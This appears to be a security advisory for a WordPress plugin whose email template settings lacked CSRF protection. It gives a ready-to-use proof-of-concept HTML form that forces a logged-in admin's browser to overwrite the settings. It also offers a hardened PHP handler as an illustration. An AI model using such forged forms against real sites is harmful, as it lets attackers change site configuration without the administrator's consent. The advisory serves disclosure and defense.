The plugin did not have a CSRF check in place before saving its Email Template settings, allowing attackers to make a logged-in admin change them via a CSRF attack.
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" method="POST">
      <input type="hidden" name="__wpdm_email_template" value="default.html" />
      <input type="hidden" name="__wpdm_email_setting[logo]" value="" />
      <input type="hidden" name="__wpdm_email_setting[banner]" value="" />
      <input type="hidden" name="__wpdm_email_setting[footer_text]" value="Changed Via CSRF" />
      <input type="hidden" name="__wpdm_email_setting[facebook]" value="" />
      <input type="hidden" name="__wpdm_email_setting[twitter]" value="" />
      <input type="hidden" name="__wpdm_email_setting[youtube]" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
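For contrast with the form above, a sketch of a handler that would reject it. This is an added example, not the plugin's actual code or its patch: the action name and POST field names are taken from the form, while the function name, nonce action string, capability and option storage are assumptions.

```php
<?php
// Hypothetical hardened handler (illustration only, not the plugin's code).
// Assumed names: EXAMPLE_NONCE_ACTION, example_save_email_setting, and the
// use of update_option() with the POST field names as option keys.
const EXAMPLE_NONCE_ACTION = 'example_wpdm_save_email_setting';

add_action('wp_ajax_wpdm_save_email_setting', 'example_save_email_setting');

function example_save_email_setting() {
    // 1. CSRF check. The nonce is bound to the logged-in user and session,
    //    and a cross-site form cannot read it, so a forged POST without a
    //    valid _wpnonce is terminated here with HTTP 403.
    check_ajax_referer(EXAMPLE_NONCE_ACTION, '_wpnonce');

    // 2. Authorization. A nonce shows the request was intended, not that
    //    the user is allowed to change site-wide settings.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'Forbidden'), 403);
    }

    // 3. Accept only the expected fields and sanitize each one.
    $template = isset($_POST['__wpdm_email_template'])
        ? sanitize_file_name(wp_unslash($_POST['__wpdm_email_template']))
        : 'default.html';

    $raw = (isset($_POST['__wpdm_email_setting']) && is_array($_POST['__wpdm_email_setting']))
        ? wp_unslash($_POST['__wpdm_email_setting'])
        : array();

    $clean = array();
    $keys  = array('logo', 'banner', 'footer_text', 'facebook', 'twitter', 'youtube');
    foreach ($keys as $key) {
        // sanitize_text_field() returns '' for arrays and strips tags.
        $clean[$key] = isset($raw[$key]) ? sanitize_text_field($raw[$key]) : '';
    }

    update_option('__wpdm_email_template', $template);
    update_option('__wpdm_email_setting', $clean);
    wp_send_json_success();
}

// The settings form must emit the matching nonce when it is rendered:
//   wp_nonce_field(EXAMPLE_NONCE_ACTION, '_wpnonce');
```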
Yes
2021-08-09 (about 1 years ago)